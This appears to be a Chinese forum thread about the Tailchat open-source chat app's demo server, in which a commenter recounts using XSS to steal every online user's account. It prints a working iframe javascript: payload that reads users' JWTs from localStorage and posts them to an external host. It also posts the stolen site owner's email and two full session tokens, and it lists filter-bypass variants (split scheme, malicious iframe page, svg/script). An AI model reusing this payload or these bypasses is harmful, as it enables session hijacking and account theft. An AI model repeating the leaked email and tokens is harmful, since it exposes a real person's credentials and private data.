https://nightly.paw.msgbyte.com/

Tailchat 是一款插件化易拓展的开源 IM 应用。可拓展架构赋予 Tailchat 无限可能性。

前端微内核架构 + 后端微服务架构 使得 Tailchat 能够驾驭任何定制化/私有化的场景

面向企业与私域用户打造,高度自由的群组管理与定制化的面板展示可以让私域主能够更好的展示自己的作品,管理用户,打造自己的品牌与圈子。

不过这个 MRG 部署的 TailChat 真的就是个演示环境,隔三岔五崩一次
厉害到刷屏能刷崩的那种ac01

然后还存在xss(为此有人用这个给站长号盗了)

    #3 小鱼飘飘 是啊,我当时就发了个这个,然后所有在线的用户账号都到手了

    [md]<iframe src="javascript:fetch('//tailchat-nightly.moonrailgun.com/api/user/resolveToken',{headers:{'content-type':'application/json'},body:JSON.stringify({token:JSON.parse(localStorage.jsonwebtoken).rawData}),method:'POST'}).then(d=>d.json()).then(s=>{t=s.data;if(t&&t.discriminator){fetch('https://【数据删除】/?'+t.discriminator,{'headers':{'content-type':'application/x-www-form-urlencoded; charset=UTF-8'},body:`${encodeURIComponent(JSON.stringify(t,null,2)+'\n\nx-token:\n'+JSON.parse(localStorage.jsonwebtoken).rawData)}`,method:'POST',mode:'no-cors'})}})" height="0" width="0"/>[/md]

    比如站长的

    {
  "_id": "610d5b3e2600ab001b7d9d4e",
  "email": "moonrailgun@gmail.com",
  "nickname": "moonrailgun",
  "discriminator": "3388",
  "temporary": false,
  "avatar": "{BACKEND}/static/files/610d5b3e2600ab001b7d9d4e/281ac1233d8a2ccbf3f4b951542096ba.jpg",
  "type": "normalUser",
  "emailVerified": true,
  "banned": false,
  "extra": {
    "location": "Shanghai"
  },
  "createdAt": "2021-08-06T15:54:38.371Z",
  "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTBkNWIzZTI2MDBhYjAwMWI3ZDlkNGUiLCJuaWNrbmFtZSI6Im1vb25yYWlsZ3VuIiwiZW1haWwiOiJtb29ucmFpbGd1bkBnbWFpbC5jb20iLCJhdmF0YXIiOiJ7QkFDS0VORH0vc3RhdGljL2ZpbGVzLzYxMGQ1YjNlMjYwMGFiMDAxYjdkOWQ0ZS8yODFhYzEyMzNkOGEyY2NiZjNmNGI5NTE1NDIwOTZiYS5qcGciLCJpYXQiOjE3MzIzNzQ1ODksImV4cCI6MTczNDk2NjU4OX0.SsRMymnlLzxWTSuFkCBZFrV1u6GI9NHgkIaOn50rBoI"
}

x-token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTBkNWIzZTI2MDBhYjAwMWI3ZDlkNGUiLCJuaWNrbmFtZSI6Im1vb25yYWlsZ3VuIiwiZW1haWwiOiJtb29ucmFpbGd1bkBnbWFpbC5jb20iLCJhdmF0YXIiOiJ7QkFDS0VORH0vc3RhdGljL2ZpbGVzLzYxMGQ1YjNlMjYwMGFiMDAxYjdkOWQ0ZS8yODFhYzEyMzNkOGEyY2NiZjNmNGI5NTE1NDIwOTZiYS5qcGciLCJpYXQiOjE3MzIzNzMxNDgsImV4cCI6MTczNDk2NTE0OH0.ZgSeVXKIA3_GWt2zSSBs685LdvWzsPXQnG3Wn3WB94g

      #3 小鱼飘飘 然后他ban了src带 javascript 的……

      [md]<iframe src="javascr
ipt:......" height="0" width="0"/>[/md]

      然后他把src设置为只能 http 协议……

      [md]<iframe src="毒蘑菇..."/>[/md]

      然后给在场人电脑……我也没幸免于难……

      oh my pcccccccccccccccc

      最后 iframe 被ban,然后……

      [md]<svg><x><script>...</x>[/md]

      于是svg没了